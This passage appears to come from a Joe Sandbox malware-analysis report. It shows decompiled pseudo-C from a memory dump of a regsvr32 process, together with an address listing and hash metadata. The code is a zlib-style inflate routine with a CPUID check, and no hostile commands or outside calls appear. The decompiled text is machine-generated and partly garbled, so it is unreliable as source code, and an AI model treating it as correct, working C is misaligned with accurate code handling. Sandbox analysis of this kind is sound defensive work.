                                                                                                                                                                                              										_t431 = _t431 | 0 << _t337;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                              										_t361 = _t200 >> 0x10;
                                                                                                                                                                                              										_t253 = _t253 - _t200;
                                                                                                                                                                                              										_t431 = _t431 >> _t200;
                                                                                                                                                                                              										_t315 = _t200;
                                                                                                                                                                                              										if((_t200 & 0x00000010) != 0) {
                                                                                                                                                                                              											break;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										if((_t200 & 0x00000040) != 0) {
                                                                                                                                                                                              											L96:
                                                                                                                                                                                              											_t280 = "invalid distance code";
                                                                                                                                                                                              											_t350 = 0x1a;
                                                                                                                                                                                              											goto L101;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t316 = _t315 & 0x0000000f;
                                                                                                                                                                                              									if(_t316 == 0) {
                                                                                                                                                                                              										if(_t361 != 1 || _t435[0xa] == _t368) {
                                                                                                                                                                                              											L38:
                                                                                                                                                                                              											_t435[0xb] = _t396;
                                                                                                                                                                                              											_t207 = _t368 - _t435[0xa];
                                                                                                                                                                                              											if(_t207 < _t361) {
                                                                                                                                                                                              												_t208 = _t435[0xd];
                                                                                                                                                                                              												_t318 =  ~_t207;
                                                                                                                                                                                              												_t414 = _t435[0xe];
                                                                                                                                                                                              												if(_t208 < _t361) {
                                                                                                                                                                                              													L100:
                                                                                                                                                                                              													_t396 = _t435[0xb];
                                                                                                                                                                                              													_t280 = "invalid distance too far back";
                                                                                                                                                                                              													_t350 = 0x1a;
                                                                                                                                                                                              													goto L101;
                                                                                                                                                                                              												}
                                                                                                                                                                                              												_t319 = _t318 + _t361;
                                                                                                                                                                                              												if(_t435[0xc] != 0) {
                                                                                                                                                                                              													_t209 = _t435[0xc];
                                                                                                                                                                                              													if(_t319 <= _t209) {
                                                                                                                                                                                              														_t416 = _t414 + _t209 - _t319;
                                                                                                                                                                                              														_t210 = _t435[6];
                                                                                                                                                                                              														if(_t210 > _t319) {
                                                                                                                                                                                              															_t210 = memcpy(_t368, _t416, _t319);
                                                                                                                                                                                              															_t435 =  &(_t435[3]);
                                                                                                                                                                                              															_t368 = _t416 + _t319 + _t319;
                                                                                                                                                                                              															_t416 = _t368 - _t361;
                                                                                                                                                                                              														}
                                                                                                                                                                                              													} else {
                                                                                                                                                                                              														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
                                                                                                                                                                                              														_t324 = _t319 - _t209;
                                                                                                                                                                                              														_t210 = _t435[6];
                                                                                                                                                                                              														if(_t210 > _t324) {
                                                                                                                                                                                              															_t210 = memcpy(_t368, _t416, _t324);
                                                                                                                                                                                              															_t435 =  &(_t435[3]);
                                                                                                                                                                                              															_t368 = _t416 + _t324 + _t324;
                                                                                                                                                                                              															_t416 = _t435[0xe];
                                                                                                                                                                                              															_t326 = _t435[0xc];
                                                                                                                                                                                              															if(_t210 > _t326) {
                                                                                                                                                                                              																_t210 = memcpy(_t368, _t416, _t326);
                                                                                                                                                                                              																_t435 =  &(_t435[3]);
                                                                                                                                                                                              																_t368 = _t416 + _t326 + _t326;
                                                                                                                                                                                              																_t416 = _t368 - _t361;
                                                                                                                                                                                              															}
                                                                                                                                                                                              														}
                                                                                                                                                                                              													}
                                                                                                                                                                                              												} else {
                                                                                                                                                                                              													_t416 = _t414 + _t208 - _t319;
                                                                                                                                                                                              													_t210 = _t435[6];
                                                                                                                                                                                              													if(_t210 > _t319) {
                                                                                                                                                                                              														_t210 = memcpy(_t368, _t416, _t319);
                                                                                                                                                                                              														_t435 =  &(_t435[3]);
                                                                                                                                                                                              														_t368 = _t416 + _t319 + _t319;
                                                                                                                                                                                              														_t416 = _t368 - _t361;
                                                                                                                                                                                              													}
                                                                                                                                                                                              												}
                                                                                                                                                                                              												_t320 = _t210;
                                                                                                                                                                                              												memcpy(_t368, _t416, _t320);
                                                                                                                                                                                              												_t435 =  &(_t435[3]);
                                                                                                                                                                                              												_t368 = _t416 + _t320 + _t320;
                                                                                                                                                                                              												_t396 = _t435[0xb];
                                                                                                                                                                                              												goto L22;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_t423 = _t368 - _t361;
                                                                                                                                                                                              											_t330 = _t435[6] - 3;
                                                                                                                                                                                              											 *_t368 =  *_t423;
                                                                                                                                                                                              											_t424 = _t423 + 3;
                                                                                                                                                                                              											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
                                                                                                                                                                                              											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
                                                                                                                                                                                              											memcpy(_t368 + 3, _t424, _t330);
                                                                                                                                                                                              											_t435 =  &(_t435[3]);
                                                                                                                                                                                              											_t368 = _t424 + _t330 + _t330;
                                                                                                                                                                                              											_t396 = _t435[0xb];
                                                                                                                                                                                              										} else {
                                                                                                                                                                                              											_t389 = _t368 - 1;
                                                                                                                                                                                              											_t222 =  *_t389;
                                                                                                                                                                                              											_t333 = _t435[6] - 3;
                                                                                                                                                                                              											 *(_t389 + 1) = _t222;
                                                                                                                                                                                              											 *(_t389 + 2) = _t222;
                                                                                                                                                                                              											 *(_t389 + 3) = _t222;
                                                                                                                                                                                              											_t390 = _t389 + 4;
                                                                                                                                                                                              											memset(_t390, _t222, _t333 << 0);
                                                                                                                                                                                              											_t435 =  &(_t435[3]);
                                                                                                                                                                                              											_t368 = _t390 + _t333;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										goto L22;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									if(_t253 < _t316) {
                                                                                                                                                                                              										asm("lodsw");
                                                                                                                                                                                              										_t336 = _t253;
                                                                                                                                                                                              										_t253 = _t253 + 0x10;
                                                                                                                                                                                              										_t431 = _t431 | 0 << _t336;
                                                                                                                                                                                              										_t316 = _t336;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t253 = _t253 - _t316;
                                                                                                                                                                                              									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
                                                                                                                                                                                              									_t431 = _t431 >> _t316;
                                                                                                                                                                                              									_t361 = _t361 + _t227;
                                                                                                                                                                                              									goto L38;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								L22:
                                                                                                                                                                                              							} while (_t435[4] > _t368 && _t435[5] > _t396);
                                                                                                                                                                                              							L104:
                                                                                                                                                                                              							if( *0x49ae040 == 2) {
                                                                                                                                                                                              								_t253 = _t431;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t176 = _t435[0x16];
                                                                                                                                                                                              							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
                                                                                                                                                                                              							_t282 = _t253 >> 3;
                                                                                                                                                                                              							_t397 = _t396 - _t282;
                                                                                                                                                                                              							_t254 = _t253 - (_t282 << 3);
                                                                                                                                                                                              							 *(_t176 + 0xc) = _t368;
                                                                                                                                                                                              							 *(_t351 + 0x3c) = _t254;
                                                                                                                                                                                              							_t284 = _t254;
                                                                                                                                                                                              							_t255 =  &(_t435[7]);
                                                                                                                                                                                              							if(_t435[5] == _t255) {
                                                                                                                                                                                              								_t266 =  *_t176;
                                                                                                                                                                                              								_t435[5] = _t266;
                                                                                                                                                                                              								_t397 = _t397 - _t255 + _t266;
                                                                                                                                                                                              								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *_t176 = _t397;
                                                                                                                                                                                              							_t258 = (1 << _t284) - 1;
                                                                                                                                                                                              							if( *0x49ae040 == 2) {
                                                                                                                                                                                              								asm("psrlq mm0, mm1");
                                                                                                                                                                                              								asm("movd ebp, mm0");
                                                                                                                                                                                              								asm("emms");
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *(_t351 + 0x38) = _t431 & _t258;
                                                                                                                                                                                              							_t259 = _t435[5];
                                                                                                                                                                                              							if(_t259 <= _t397) {
                                                                                                                                                                                              								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t260 = _t435[4];
                                                                                                                                                                                              							if(_t260 <= _t368) {
                                                                                                                                                                                              								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							asm("popfd");
                                                                                                                                                                                              							return _t176;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_push(_t172);
                                                                                                                                                                                              						_push(_t252);
                                                                                                                                                                                              						_push(_t278);
                                                                                                                                                                                              						_push(_t347);
                                                                                                                                                                                              						asm("pushfd");
                                                                                                                                                                                              						 *_t435 =  *_t435 ^ 0x00200000;
                                                                                                                                                                                              						asm("popfd");
                                                                                                                                                                                              						asm("pushfd");
                                                                                                                                                                                              						_pop(_t364);
                                                                                                                                                                                              						_t365 = _t364 ^  *_t435;
                                                                                                                                                                                              						if(_t365 == 0) {
                                                                                                                                                                                              							L15:
                                                                                                                                                                                              							 *0x49ae040 = 3;
                                                                                                                                                                                              							L16:
                                                                                                                                                                                              							_pop(_t347);
                                                                                                                                                                                              							_pop(_t278);
                                                                                                                                                                                              							_pop(_t252);
                                                                                                                                                                                              							_pop(_t172);
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						asm("cpuid");
                                                                                                                                                                                              						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							asm("cpuid");
                                                                                                                                                                                              							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
                                                                                                                                                                                              								goto L15;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								 *0x49ae040 = 2;
                                                                                                                                                                                              								goto L16;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					asm("emms");
                                                                                                                                                                                              					asm("movd mm0, ebp");
                                                                                                                                                                                              					_t431 = _t252;
                                                                                                                                                                                              					asm("movd mm4, dword [esp]");
                                                                                                                                                                                              					asm("movq mm3, mm4");
                                                                                                                                                                                              					asm("movd mm5, dword [esp+0x4]");
                                                                                                                                                                                              					asm("movq mm2, mm5");
                                                                                                                                                                                              					asm("pxor mm1, mm1");
                                                                                                                                                                                              					_t253 = _t435[2];
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						asm("psrlq mm0, mm1");
                                                                                                                                                                                              						if(_t431 <= 0x20) {
                                                                                                                                                                                              							asm("movd mm6, ebp");
                                                                                                                                                                                              							asm("movd mm7, dword [esi]");
                                                                                                                                                                                              							_t396 = _t396 + 4;
                                                                                                                                                                                              							asm("psllq mm7, mm6");
                                                                                                                                                                                              							_t431 = _t431 + 0x20;
                                                                                                                                                                                              							asm("por mm0, mm7");
                                                                                                                                                                                              						}
                                                                                                                                                                                              						asm("pand mm4, mm0");
                                                                                                                                                                                              						asm("movd eax, mm4");
                                                                                                                                                                                              						asm("movq mm4, mm3");
                                                                                                                                                                                              						_t173 =  *(_t253 + _t172 * 4);
                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                              							_t279 = _t173 & 0x000000ff;
                                                                                                                                                                                              							asm("movd mm1, ecx");
                                                                                                                                                                                              							_t431 = _t431 - _t279;
                                                                                                                                                                                              							if(_t173 == 0) {
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t349 = _t173 >> 0x10;
                                                                                                                                                                                              							if((_t173 & 0x00000010) == 0) {
                                                                                                                                                                                              								if((_t173 & 0x00000040) != 0) {
                                                                                                                                                                                              									goto L97;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								asm("psrlq mm0, mm1");
                                                                                                                                                                                              								asm("movd ecx, mm0");
                                                                                                                                                                                              								_t173 =  *(_t253 + ((_t279 &  *(0x49a668c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t178 = _t173 & 0x0000000f;
                                                                                                                                                                                              							if(_t178 != 0) {
                                                                                                                                                                                              								asm("psrlq mm0, mm1");
                                                                                                                                                                                              								asm("movd mm1, eax");
                                                                                                                                                                                              								asm("movd ecx, mm0");
                                                                                                                                                                                              								_t431 = _t431 - _t178;
                                                                                                                                                                                              								_t349 = _t349 + (_t279 &  *(0x49a668c + _t178 * 4));
                                                                                                                                                                                              							}
                                                                                                                                                                                              							asm("psrlq mm0, mm1");
                                                                                                                                                                                              							if(_t431 <= 0x20) {
                                                                                                                                                                                              								asm("movd mm6, ebp");
                                                                                                                                                                                              								asm("movd mm7, dword [esi]");
                                                                                                                                                                                              								_t396 = _t396 + 4;
                                                                                                                                                                                              								asm("psllq mm7, mm6");
                                                                                                                                                                                              								_t431 = _t431 + 0x20;
                                                                                                                                                                                              								asm("por mm0, mm7");
                                                                                                                                                                                              							}
                                                                                                                                                                                              							asm("pand mm5, mm0");
                                                                                                                                                                                              							asm("movd eax, mm5");
                                                                                                                                                                                              							asm("movq mm5, mm2");
                                                                                                                                                                                              							_t179 =  *(_t435[3] + _t178 * 4);
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t287 = _t179 & 0x000000ff;
                                                                                                                                                                                              								_t253 = _t179 >> 0x10;
                                                                                                                                                                                              								_t431 = _t431 - _t287;
                                                                                                                                                                                              								asm("movd mm1, ecx");
                                                                                                                                                                                              								if((_t179 & 0x00000010) != 0) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if((_t179 & 0x00000040) != 0) {
                                                                                                                                                                                              									goto L96;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								asm("psrlq mm0, mm1");
                                                                                                                                                                                              								asm("movd ecx, mm0");
                                                                                                                                                                                              								_t179 =  *(_t435[3] + ((_t287 &  *(0x49a668c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t182 = _t179 & 0x0000000f;
                                                                                                                                                                                              							if(_t182 == 0) {
                                                                                                                                                                                              								if(_t253 != 1 || _t435[0xa] == _t368) {
                                                                                                                                                                                              									L76:
                                                                                                                                                                                              									_t435[0xb] = _t396;
                                                                                                                                                                                              									_t184 = _t368 - _t435[0xa];
                                                                                                                                                                                              									if(_t184 < _t253) {
                                                                                                                                                                                              										_t185 = _t435[0xd];
                                                                                                                                                                                              										_t291 =  ~_t184;
                                                                                                                                                                                              										_t403 = _t435[0xe];
                                                                                                                                                                                              										if(_t185 < _t253) {
                                                                                                                                                                                              											goto L100;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t292 = _t291 + _t253;
                                                                                                                                                                                              										if(_t435[0xc] != 0) {
                                                                                                                                                                                              											_t186 = _t435[0xc];
                                                                                                                                                                                              											if(_t292 <= _t186) {
                                                                                                                                                                                              												_t405 = _t403 + _t186 - _t292;
                                                                                                                                                                                              												if(_t349 > _t292) {
                                                                                                                                                                                              													_t349 = _t349 - _t292;
                                                                                                                                                                                              													memcpy(_t368, _t405, _t292);
                                                                                                                                                                                              													_t435 =  &(_t435[3]);
                                                                                                                                                                                              													_t368 = _t405 + _t292 + _t292;
                                                                                                                                                                                              													_t405 = _t368 - _t253;
                                                                                                                                                                                              												}
                                                                                                                                                                                              											} else {
                                                                                                                                                                                              												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
                                                                                                                                                                                              												_t296 = _t292 - _t186;
                                                                                                                                                                                              												if(_t349 > _t296) {
                                                                                                                                                                                              													_t349 = _t349 - _t296;
                                                                                                                                                                                              													memcpy(_t368, _t405, _t296);
                                                                                                                                                                                              													_t435 =  &(_t435[3]);
                                                                                                                                                                                              													_t368 = _t405 + _t296 + _t296;
                                                                                                                                                                                              													_t405 = _t435[0xe];
                                                                                                                                                                                              													_t298 = _t435[0xc];
                                                                                                                                                                                              													if(_t349 > _t298) {
                                                                                                                                                                                              														_t349 = _t349 - _t298;
                                                                                                                                                                                              														memcpy(_t368, _t405, _t298);
                                                                                                                                                                                              														_t435 =  &(_t435[3]);
                                                                                                                                                                                              														_t368 = _t405 + _t298 + _t298;
                                                                                                                                                                                              														_t405 = _t368 - _t253;
                                                                                                                                                                                              													}
                                                                                                                                                                                              												}
                                                                                                                                                                                              											}
                                                                                                                                                                                              										} else {
                                                                                                                                                                                              											_t405 = _t403 + _t185 - _t292;
                                                                                                                                                                                              											if(_t349 > _t292) {
                                                                                                                                                                                              												_t349 = _t349 - _t292;
                                                                                                                                                                                              												memcpy(_t368, _t405, _t292);
                                                                                                                                                                                              												_t435 =  &(_t435[3]);
                                                                                                                                                                                              												_t368 = _t405 + _t292 + _t292;
                                                                                                                                                                                              												_t405 = _t368 - _t253;
                                                                                                                                                                                              											}
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t293 = _t349;
                                                                                                                                                                                              										_t172 = memcpy(_t368, _t405, _t293);
                                                                                                                                                                                              										_t435 =  &(_t435[3]);
                                                                                                                                                                                              										_t368 = _t405 + _t293 + _t293;
                                                                                                                                                                                              										_t396 = _t435[0xb];
                                                                                                                                                                                              										_t253 = _t435[2];
                                                                                                                                                                                              										goto L64;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t412 = _t368 - _t253;
                                                                                                                                                                                              									_t302 = _t349 - 3;
                                                                                                                                                                                              									 *_t368 =  *_t412;
                                                                                                                                                                                              									_t413 = _t412 + 3;
                                                                                                                                                                                              									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
                                                                                                                                                                                              									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
                                                                                                                                                                                              									_t172 = memcpy(_t368 + 3, _t413, _t302);
                                                                                                                                                                                              									_t435 =  &(_t435[3]);
                                                                                                                                                                                              									_t368 = _t413 + _t302 + _t302;
                                                                                                                                                                                              									_t396 = _t435[0xb];
                                                                                                                                                                                              									_t253 = _t435[2];
                                                                                                                                                                                              									goto L64;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t380 = _t368 - 1;
                                                                                                                                                                                              									_t194 =  *_t380;
                                                                                                                                                                                              									_t305 = _t349 - 3;
                                                                                                                                                                                              									 *(_t380 + 1) = _t194;
                                                                                                                                                                                              									 *(_t380 + 2) = _t194;
                                                                                                                                                                                              									 *(_t380 + 3) = _t194;
                                                                                                                                                                                              									_t381 = _t380 + 4;
                                                                                                                                                                                              									_t172 = memset(_t381, _t194, _t305 << 0);
                                                                                                                                                                                              									_t435 =  &(_t435[3]);
                                                                                                                                                                                              									_t368 = _t381 + _t305;
                                                                                                                                                                                              									_t253 = _t435[2];
                                                                                                                                                                                              									L64:
                                                                                                                                                                                              									if(_t435[4] <= _t368) {
                                                                                                                                                                                              										goto L104;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L65;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							asm("psrlq mm0, mm1");
                                                                                                                                                                                              							asm("movd mm1, eax");
                                                                                                                                                                                              							asm("movd ecx, mm0");
                                                                                                                                                                                              							_t431 = _t431 - _t182;
                                                                                                                                                                                              							_t253 = _t253 + (_t287 &  *(0x49a668c + _t182 * 4));
                                                                                                                                                                                              							goto L76;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t172 = _t173 >> 0x10;
                                                                                                                                                                                              						asm("stosb");
                                                                                                                                                                                              						goto L64;
                                                                                                                                                                                              						L65:
                                                                                                                                                                                              					} while (_t435[5] > _t396);
                                                                                                                                                                                              					goto L104;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x049a68d6
                                                                                                                                                                                              0x049a68d8
                                                                                                                                                                                              0x049a68d8
                                                                                                                                                                                              0x049a68da
                                                                                                                                                                                              0x049a68e1
                                                                                                                                                                                              0x049a68e5
                                                                                                                                                                                              0x049a68e7
                                                                                                                                                                                              0x049a68e9
                                                                                                                                                                                              0x049a68ee
                                                                                                                                                                                              0x049a68ee
                                                                                                                                                                                              0x049a68fa
                                                                                                                                                                                              0x049a68fd
                                                                                                                                                                                              0x049a68ff
                                                                                                                                                                                              0x049a6904
                                                                                                                                                                                              0x049a6906
                                                                                                                                                                                              0x049a6908
                                                                                                                                                                                              0x049a690c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a69c6
                                                                                                                                                                                              0x049a6cae
                                                                                                                                                                                              0x049a6cae
                                                                                                                                                                                              0x049a6cb3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6cb3
                                                                                                                                                                                              0x049a69dc
                                                                                                                                                                                              0x049a69dc
                                                                                                                                                                                              0x049a6912
                                                                                                                                                                                              0x049a6915
                                                                                                                                                                                              0x049a697f
                                                                                                                                                                                              0x049a693e
                                                                                                                                                                                              0x049a693e
                                                                                                                                                                                              0x049a6944
                                                                                                                                                                                              0x049a694a
                                                                                                                                                                                              0x049a69e6
                                                                                                                                                                                              0x049a69ea
                                                                                                                                                                                              0x049a69ec
                                                                                                                                                                                              0x049a69f2
                                                                                                                                                                                              0x049a6cd6
                                                                                                                                                                                              0x049a6cd6
                                                                                                                                                                                              0x049a6cda
                                                                                                                                                                                              0x049a6cdf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6cdf
                                                                                                                                                                                              0x049a69f8
                                                                                                                                                                                              0x049a69ff
                                                                                                                                                                                              0x049a6a25
                                                                                                                                                                                              0x049a6a2b
                                                                                                                                                                                              0x049a6a5b
                                                                                                                                                                                              0x049a6a5d
                                                                                                                                                                                              0x049a6a63
                                                                                                                                                                                              0x049a6a67
                                                                                                                                                                                              0x049a6a67
                                                                                                                                                                                              0x049a6a67
                                                                                                                                                                                              0x049a6a6b
                                                                                                                                                                                              0x049a6a6b
                                                                                                                                                                                              0x049a6a2d
                                                                                                                                                                                              0x049a6a33
                                                                                                                                                                                              0x049a6a35
                                                                                                                                                                                              0x049a6a37
                                                                                                                                                                                              0x049a6a3d
                                                                                                                                                                                              0x049a6a41
                                                                                                                                                                                              0x049a6a41
                                                                                                                                                                                              0x049a6a41
                                                                                                                                                                                              0x049a6a43
                                                                                                                                                                                              0x049a6a47
                                                                                                                                                                                              0x049a6a4d
                                                                                                                                                                                              0x049a6a51
                                                                                                                                                                                              0x049a6a51
                                                                                                                                                                                              0x049a6a51
                                                                                                                                                                                              0x049a6a55
                                                                                                                                                                                              0x049a6a55
                                                                                                                                                                                              0x049a6a4d
                                                                                                                                                                                              0x049a6a3d
                                                                                                                                                                                              0x049a6a01
                                                                                                                                                                                              0x049a6a03
                                                                                                                                                                                              0x049a6a05
                                                                                                                                                                                              0x049a6a0b
                                                                                                                                                                                              0x049a6a0f
                                                                                                                                                                                              0x049a6a0f
                                                                                                                                                                                              0x049a6a0f
                                                                                                                                                                                              0x049a6a13
                                                                                                                                                                                              0x049a6a13
                                                                                                                                                                                              0x049a6a0b
                                                                                                                                                                                              0x049a6a6d
                                                                                                                                                                                              0x049a6a6f
                                                                                                                                                                                              0x049a6a6f
                                                                                                                                                                                              0x049a6a6f
                                                                                                                                                                                              0x049a6a71
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6a71
                                                                                                                                                                                              0x049a6956
                                                                                                                                                                                              0x049a6958
                                                                                                                                                                                              0x049a695d
                                                                                                                                                                                              0x049a6965
                                                                                                                                                                                              0x049a6968
                                                                                                                                                                                              0x049a696b
                                                                                                                                                                                              0x049a6971
                                                                                                                                                                                              0x049a6971
                                                                                                                                                                                              0x049a6971
                                                                                                                                                                                              0x049a6973
                                                                                                                                                                                              0x049a6987
                                                                                                                                                                                              0x049a6987
                                                                                                                                                                                              0x049a698c
                                                                                                                                                                                              0x049a698e
                                                                                                                                                                                              0x049a6991
                                                                                                                                                                                              0x049a6994
                                                                                                                                                                                              0x049a6997
                                                                                                                                                                                              0x049a699a
                                                                                                                                                                                              0x049a699d
                                                                                                                                                                                              0x049a699d
                                                                                                                                                                                              0x049a699d
                                                                                                                                                                                              0x049a699d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a697f
                                                                                                                                                                                              0x049a6919
                                                                                                                                                                                              0x049a691f
                                                                                                                                                                                              0x049a6921
                                                                                                                                                                                              0x049a6923
                                                                                                                                                                                              0x049a6928
                                                                                                                                                                                              0x049a692a
                                                                                                                                                                                              0x049a692a
                                                                                                                                                                                              0x049a6934
                                                                                                                                                                                              0x049a6936
                                                                                                                                                                                              0x049a6938
                                                                                                                                                                                              0x049a693a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a693a
                                                                                                                                                                                              0x049a688c
                                                                                                                                                                                              0x049a688c
                                                                                                                                                                                              0x049a6cf8
                                                                                                                                                                                              0x049a6cff
                                                                                                                                                                                              0x049a6d01
                                                                                                                                                                                              0x049a6d01
                                                                                                                                                                                              0x049a6d03
                                                                                                                                                                                              0x049a6d09
                                                                                                                                                                                              0x049a6d0c
                                                                                                                                                                                              0x049a6d0f
                                                                                                                                                                                              0x049a6d14
                                                                                                                                                                                              0x049a6d16
                                                                                                                                                                                              0x049a6c85
                                                                                                                                                                                              0x049a6c89
                                                                                                                                                                                              0x049a6c89
                                                                                                                                                                                              0x049a6c81
                                                                                                                                                                                              0x049a6c71
                                                                                                                                                                                              0x049a6c3d
                                                                                                                                                                                              0x049a6c3f
                                                                                                                                                                                              0x049a6c43
                                                                                                                                                                                              0x049a6c45
                                                                                                                                                                                              0x049a6c47
                                                                                                                                                                                              0x049a6c47
                                                                                                                                                                                              0x049a6c47
                                                                                                                                                                                              0x049a6c4b
                                                                                                                                                                                              0x049a6c4b
                                                                                                                                                                                              0x049a6c43
                                                                                                                                                                                              0x049a6c9d
                                                                                                                                                                                              0x049a6c9f
                                                                                                                                                                                              0x049a6c9f
                                                                                                                                                                                              0x049a6c9f
                                                                                                                                                                                              0x049a6ca1
                                                                                                                                                                                              0x049a6ca5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6ca5
                                                                                                                                                                                              0x049a6b7b
                                                                                                                                                                                              0x049a6b7d
                                                                                                                                                                                              0x049a6b82
                                                                                                                                                                                              0x049a6b8a
                                                                                                                                                                                              0x049a6b8d
                                                                                                                                                                                              0x049a6b90
                                                                                                                                                                                              0x049a6b96
                                                                                                                                                                                              0x049a6b96
                                                                                                                                                                                              0x049a6b96
                                                                                                                                                                                              0x049a6b98
                                                                                                                                                                                              0x049a6b9c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6bb3
                                                                                                                                                                                              0x049a6bb3
                                                                                                                                                                                              0x049a6bb6
                                                                                                                                                                                              0x049a6bb8
                                                                                                                                                                                              0x049a6bbb
                                                                                                                                                                                              0x049a6bbe
                                                                                                                                                                                              0x049a6bc1
                                                                                                                                                                                              0x049a6bc4
                                                                                                                                                                                              0x049a6bc7
                                                                                                                                                                                              0x049a6bc7
                                                                                                                                                                                              0x049a6bc7
                                                                                                                                                                                              0x049a6bc9
                                                                                                                                                                                              0x049a6ad2
                                                                                                                                                                                              0x049a6ad6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6ad6
                                                                                                                                                                                              0x049a6bab
                                                                                                                                                                                              0x049a6b51
                                                                                                                                                                                              0x049a6b54
                                                                                                                                                                                              0x049a6b57
                                                                                                                                                                                              0x049a6b5a
                                                                                                                                                                                              0x049a6b63
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6b63
                                                                                                                                                                                              0x049a6ace
                                                                                                                                                                                              0x049a6ad1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6adc
                                                                                                                                                                                              0x049a6adc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6ae2

                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                                                                                                              • API String ID: 0-3089872807
                                                                                                                                                                                              • Opcode ID: e66e452a4e1a414fed629f3f5c566b1a1cc9717cafb32c0c3207f734a6b0df38
                                                                                                                                                                                              • Instruction ID: 6ef3acb0d17c0a45443955ebb2beffe6beefbcdb2d08ffa8653fcf0924dc6410
                                                                                                                                                                                              • Opcode Fuzzy Hash: e66e452a4e1a414fed629f3f5c566b1a1cc9717cafb32c0c3207f734a6b0df38
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C12CF32A083518FDB15CE28C59422ABBE2EB84354F0D8A3DE9D597B41E375BD68C781
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E0499E400(void* __ecx) {
                                                                                                                                                                                              				char _v8;
